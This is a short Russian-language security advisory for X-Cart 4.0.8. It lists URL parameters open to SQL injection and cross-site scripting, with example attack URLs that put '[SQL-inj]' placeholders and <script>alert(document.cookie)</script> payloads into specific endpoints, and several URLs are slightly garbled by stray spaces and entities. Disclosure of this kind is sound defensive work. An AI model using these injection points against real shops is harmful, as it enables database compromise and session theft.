Программа: X-Cart 4.0.8
Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.
1. Программное обеспечение недостаточно обрабатывает входные данные в нескольких параметрах. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения.
Пример:
http://[target]/home.php?cat='[SQL-inj]
http://[target]/home.php?printable='[SQL-inj]
http://[target]/product.php?productid='[SQL-inj]
http://[target]/product.php?mode='[SQL-inj]
http://[target]/error_message.php?access_denied& id='[SQL-inj]
http://[target]/help.php?section='[SQL-inj]
http://[target]/orders.php?mode='[SQL-inj]
http://[target]/register.php?mode='[SQL-inj]
http://[target]/ search.php?mode='[SQL-inj]
http://[target]/giftcert.php?gcid='[SQL-inj]
http://[target]/giftcert.php?gcindex='[SQL-inj]
2. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
http://[target]/home.php?cat='><script>alert (document.cookie)</script>
ht tp://[target]/home.php?printable='><script& gt;alert(document.cookie)</script>
http://[target]/product.php?productid='><script >alert(document.cookie)</s cript>
http://[target]/product.php?mode='><script> alert(document.cookie)</script>
http://[target]/error_message.php?access_denied& id='><script>aler t(document.cookie)</script>
http://[target]/help.php?section='><script>alert (document.cookie)</script>
http://[target]/orders.php?mode='><script> ;alert(document.cookie)</script>
http://[target]/register.php?mode='><script> alert(document.cookie)</script>
http://[target]/search.php?mode='><scr ipt> alert(document.cookie)</script>
http://[target]/giftcert.php?gcid='><script>alert( document.cookie)</script>
http://[target]/giftcert.php?gcinde x='><script>
alert(document.cookie)</script>
